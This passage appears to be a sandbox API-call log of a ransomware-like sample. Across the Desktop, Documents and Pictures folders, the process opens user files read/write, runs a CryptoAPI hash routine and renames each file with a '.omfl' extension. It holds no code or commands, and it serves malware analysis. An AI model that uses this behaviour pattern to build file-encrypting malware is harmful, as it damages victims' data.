returned 1 [0134.293] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.293] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.293] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.293] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.294] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\KAWZ0cxNQWiFNSyE.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\kawz0cxnqwifnsye.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\KAWZ0cxNQWiFNSyE.bmp.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\kawz0cxnqwifnsye.bmp.omfl")) returned 1 [0134.296] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\LOto74AGvL.pptx") returned=".pptx" [0134.296] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\LOto74AGvL.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\loto74agvl.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.296] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=8514) returned 1 [0134.296] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.299] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.300] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.300] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.300] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.300] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.300] GetLastError () returned 0x0 [0134.301] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.301] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.301] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.301] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.301] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.301] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\LOto74AGvL.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\loto74agvl.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\LOto74AGvL.pptx.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\loto74agvl.pptx.omfl")) returned 1 [0134.303] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\r_7Ay0ZuX.m4a") returned=".m4a" [0134.303] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\r_7Ay0ZuX.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\r_7ay0zux.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.303] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=33882) returned 1 [0134.303] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.307] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.308] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.308] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.308] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.308] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.308] GetLastError () returned 0x0 [0134.308] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.308] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.308] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.308] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.308] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.309] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\r_7Ay0ZuX.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\r_7ay0zux.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\r_7Ay0ZuX.m4a.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\r_7ay0zux.m4a.omfl")) returned 1 [0134.311] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0134.311] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0134.311] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\") returned="GG7LokQ3R5cq6 ylO\\" [0134.311] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\") returned="aFM0SjkBF-UdBxYLzMZ\\" [0134.311] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0134.311] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0134.312] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0134.312] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0134.312] PathFindFileNameW (pszPath="") returned="" [0134.312] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\NyPbe.docx") returned=".docx" [0134.312] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\NyPbe.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\gg7lokq3r5cq6 ylo\\nypbe.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.312] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=45069) returned 1 [0134.312] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.315] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0134.316] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.316] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.317] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.317] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.317] GetLastError () returned 0x0 [0134.317] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.317] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0134.317] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.317] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.317] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.318] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\NyPbe.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\gg7lokq3r5cq6 ylo\\nypbe.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\NyPbe.docx.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\gg7lokq3r5cq6 ylo\\nypbe.docx.omfl")) returned 1 [0134.320] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\vp9pZCr9q.ods") returned=".ods" [0134.320] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\vp9pZCr9q.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\gg7lokq3r5cq6 ylo\\vp9pzcr9q.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.320] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=4088) returned 1 [0134.320] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.323] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0134.324] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.324] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.324] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.324] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.324] GetLastError () returned 0x0 [0134.324] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.324] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0134.324] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.324] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.325] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.325] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\vp9pZCr9q.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\gg7lokq3r5cq6 ylo\\vp9pzcr9q.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\vp9pZCr9q.ods.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\gg7lokq3r5cq6 ylo\\vp9pzcr9q.ods.omfl")) returned 1 [0134.327] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\xXzHqjzdUkA.ods") returned=".ods" [0134.327] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\xXzHqjzdUkA.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\gg7lokq3r5cq6 ylo\\xxzhqjzduka.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.327] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=62253) returned 1 [0134.327] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.331] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0134.332] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.332] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.332] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.332] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.332] GetLastError () returned 0x0 [0134.332] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.332] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0134.332] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.332] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.332] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.333] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\xXzHqjzdUkA.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\gg7lokq3r5cq6 ylo\\xxzhqjzduka.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\xXzHqjzdUkA.ods.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\gg7lokq3r5cq6 ylo\\xxzhqjzduka.ods.omfl")) returned 1 [0134.335] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0134.335] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0134.335] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="_private\\" [0134.335] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="My Shapes\\" [0134.335] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0134.335] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0134.336] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0134.336] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0134.336] PathFindFileNameW (pszPath="") returned="" [0134.343] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico") returned=".ico" [0134.344] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.345] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=29926) returned 1 [0134.345] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.387] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.388] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.388] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.388] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.388] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.388] GetLastError () returned 0x0 [0134.389] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.389] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.389] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.389] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.389] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.390] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico.omfl")) returned 1 [0134.392] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0134.392] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0134.392] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\") returned="2-VviHUj4Jrbbiwm1-j\\" [0134.392] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\") returned="SqYhvBjGVsjCxavcn\\" [0134.392] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0134.392] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0134.392] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0134.392] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0134.392] PathFindFileNameW (pszPath="") returned="" [0134.392] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\10I9 Sr.png") returned=".png" [0134.392] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\10I9 Sr.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\2-vvihuj4jrbbiwm1-j\\10i9 sr.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.393] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=66617) returned 1 [0134.393] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.396] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0134.397] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.397] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.397] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.397] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.397] GetLastError () returned 0x0 [0134.398] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.398] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0134.398] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.398] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.398] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.399] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\10I9 Sr.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\2-vvihuj4jrbbiwm1-j\\10i9 sr.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\10I9 Sr.png.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\2-vvihuj4jrbbiwm1-j\\10i9 sr.png.omfl")) returned 1 [0134.401] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\1OPjlQJ72J8EoFRZF.jpg") returned=".jpg" [0134.401] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\1OPjlQJ72J8EoFRZF.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\2-vvihuj4jrbbiwm1-j\\1opjlqj72j8eofrzf.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.401] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=100688) returned 1 [0134.401] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.405] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0134.406] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.406] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.406] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.406] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.406] GetLastError () returned 0x0 [0134.406] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.406] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0134.406] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.406] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.406] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.408] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\1OPjlQJ72J8EoFRZF.jpg" (normalized: "c:\\users\\5p5nrgjn0js 